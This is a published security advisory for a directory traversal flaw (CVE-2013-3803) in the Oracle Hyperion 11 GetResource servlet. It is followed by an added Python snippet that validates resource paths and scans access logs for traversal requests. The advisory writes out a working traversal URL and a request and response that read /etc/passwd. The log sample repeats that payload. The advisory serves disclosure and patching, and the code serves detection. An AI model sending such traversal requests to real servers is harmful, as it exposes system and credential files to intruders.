Oracle Hyperion 11 Directory Traversal

Reported by Richard Warren, 31 Jul 2013 (source: packetstorm, packetstormsecurity.com)

Oracle Hyperion 11 Directory Traversal, Vulnerable to Directory Traversal Attack, Fixed in Oracle CPU July 201

Related

| Family | Title | Published | Source |
|---|---|---|---|
| 0day.today | Oracle Hyperion 11 - Directory Traversal | 3 Aug 2013 00:00 | zdt |
| ATTACKERKB | CVE-2013-3803 | 17 Jul 2013 13:41 | attackerkb |
| Circl | CVE-2013-3803 | 2 Aug 2013 00:00 | circl |
| CVE | CVE-2013-3803 | 17 Jul 2013 10:00 | cve |
| Cvelist | CVE-2013-3803 | 17 Jul 2013 10:00 | cvelist |
| Exploit DB | Oracle Hyperion 11 - Directory Traversal | 2 Aug 2013 00:00 | exploitdb |
| exploitpack | Oracle Hyperion 11 - Directory Traversal | 2 Aug 2013 00:00 | exploitpack |
| NVD | CVE-2013-3803 | 17 Jul 2013 13:41 | nvd |
| Oracle | Oracle Critical Patch Update - July 2013 | 16 Jul 2013 00:00 | oracle |
=======
Summary
=======
Name: Oracle Hyperion 11 - Directory Traversal
Release Date: 30 July 2013
Reference: NGS00434
Discoverer: Richard Warren <[email protected]>
Vendor: Oracle
Vendor Reference: S0318807
Systems Affected: Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier
Risk: High
Status: Published

========
TimeLine
========
Discovered: 20 November 2012
Released: 20 November 2012
Approved: 20 November 2012
Reported: 20 November 2012
Fixed: 16 July 2013
Published: 30 July 2013

===========
Description
===========
Product: Oracle
Application: Hyperion
Version: 11.x

Vulnerability
-------------

The application was found to be vulnerable to a directory traversal attack via the ResourceName parameter of the GetResource servlet. The following URL resulted in directory traversal:

http://localhost:19000/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../LFI_HERE

=================
Technical Details
=================
Exploitation
------------

The following request/response was observed:

```http
GET /raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 12 Nov 2012 15:28:10 GMT
Server: Oracle-Application-Server-11g
Cache-Control: no-cache
Pragma: no-cache
Expires: Mon, 1 Jan 1990 00:00:00 GMT
Last-Modified: Mon, 12 Nov 2012 15:28:10 GMT
X-ORACLE-DMS-ECID: 004n^rmuJTjAtH^5lV5EiZ0004FS0058zX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/plain
Content-Language: en

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
--SNIP--
```

===============
Fix Information
===============
Fixed in Oracle CPU July 2013:
http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html
Assigned CVE-2013-3803


NCC Group Research
http://www.nccgroup.com/research
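Two defensive checks for the GetResource ResourceName traversal described in the advisory, as an added example that is neither NCC Group's nor Oracle's code: a lexical containment check a servlet should apply before opening ResourceName under its document root, and a sweep over access-log lines that flags GetResource requests whose ResourceName escapes that root. The document root, the `_log` helper and the sample log lines (Common Log Format) are constructed assumptions.

```python
from pathlib import PurePosixPath
from urllib.parse import parse_qs, unquote, urlsplit

DOC_ROOT = PurePosixPath("/opt/hyperion/raframework/docs")  # assumed root


def resolve_resource(doc_root, resource_name):
    """Resolve resource_name under doc_root lexically; None if it escapes.
    Decodes twice (double-encoded dots), treats '\\' as '/', rejects NUL."""
    name = unquote(unquote(resource_name)).replace("\\", "/")
    if "\x00" in name:
        return None
    parts = []
    for seg in name.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:  # would climb above doc_root: reject
                return None
            parts.pop()
        else:
            parts.append(seg)
    return doc_root.joinpath(*parts)


def find_traversal_requests(log_lines, doc_root=DOC_ROOT):
    """Return (client_ip, ResourceName) for GetResource hits that escape
    doc_root. Lines are assumed to be in Common Log Format."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 7 or fields[5] != '"GET':
            continue
        url = urlsplit(fields[6])
        if not url.path.endswith("/raframework/ihtml/GetResource"):
            continue
        for name in parse_qs(url.query).get("ResourceName", []):
            if resolve_resource(doc_root, name) is None:
                hits.append((fields[0], name))
    return hits


def _log(ip, name):  # constructed Common Log Format line for the examples
    return (f'{ip} - - [12/Nov/2012:15:28:10 +0000] "GET /raframework/ihtml/'
            f'GetResource?DocUUID=x&DocInstanceID=1&ResourceName={name} HTTP/1.0" 200 512')


SAMPLE_LOG = [_log("10.0.0.5", "reports/q3.html"),
              _log("10.0.0.5", "reports/../reports/q3.html"),  # stays in root
              _log("10.0.0.9", "../../../../../../etc/passwd")]  # advisory payload
```

The in-root `reports/../reports/q3.html` line shows the check only rejects names that climb above the document root, not every `..`.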
